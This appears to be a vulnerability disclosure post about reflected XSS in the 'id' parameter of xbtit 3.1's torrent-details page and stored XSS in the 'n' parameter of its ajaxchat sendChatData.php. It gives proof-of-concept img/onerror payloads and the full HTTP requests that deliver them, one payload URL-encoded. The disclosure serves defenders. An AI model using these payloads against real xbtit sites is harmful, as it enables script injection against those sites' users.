Stored & Reflected XSS affecting xbtit 3.1 and xbtitFM 3.12 min read

Reflected XSS

The /index.php?page=torrent-details is actually /details.php called through page parameter from index.php. The id parameter (GET ) is vulnerable to Reflected XSS.

The PoC contains the following xss payload

<img src=a onerror=alert(6*8)>


GET /xbtit/xbtit-3.1-master/index.php?page=torrent-details&amp;id=f1fcdc1462d36530f526c1d9402eec9100b7ba18rsswr%3Cimg%20src%3da%20onerror%3dalert(6*8)%3Epbubj&amp;rating=5&amp;vote=Vote! HTTP/1.1
Host: xbtit.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ajax_poller_1=1; PHPSESSID=0n4mf9l7hkfccqjc3ivj2ucd7k; uid=6; pass=e6d36bba3f1b36152182ad0093441345
Upgrade-Insecure-Requests: 1

Stored XSS

The /ajaxchat/sendChatData.php page is vulnerable to Stored XSS thought the n parameter (POST).

This is the original legitimate POST request to send a message to the chat box.

POST /xbtit/xbtit-3.1-master/ajaxchat/sendChatData.php HTTP/1.1
Host: xbtit.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://xbtit.local
Connection: close
Referer: http://xbtit.local/xbtit/xbtit-3.1-master/index.php
Cookie: ajax_poller_1=1; PHPSESSID=0n4mf9l7hkfccqjc3ivj2ucd7k; uid=6; pass=e6d36bba3f1b36152182ad0093441345

n=user&amp;c=hello&amp;u=6

This is the modified POST request to send a message to the chat box that contains the following PoC XSS payload appended to the n parameter (POST) in URL encoded format that contains the username of the user that will post the message.


<img src=a onerror=alert("XSS")>



POST /xbtit/xbtit-3.1-master/ajaxchat/sendChatData.php HTTP/1.1
Host: xbtit.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://xbtit.local
Connection: close
Referer: http://xbtit.local/xbtit/xbtit-3.1-master/index.php
Cookie: ajax_poller_1=1; PHPSESSID=0n4mf9l7hkfccqjc3ivj2ucd7k; uid=6; pass=e6d36bba3f1b36152182ad0093441345

n=user%3c%69%6d%67%20%73%72%63%3d%61%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%22%58%53%53%22%29%3e&amp;c=hello&amp;u=6

[Vulnerability Type]
XSS stored & reflected

——————————————

[Vendor of Product]
Btiteam
https://github.com/btiteam/xbtit-3.1

——————————————

[Attack Type]
Remote – Authenticated

——————————————

[Reference]

https://github.com/btiteam/xbtit-3.1/

Leave a Reply

Your email address will not be published. Required fields are marked *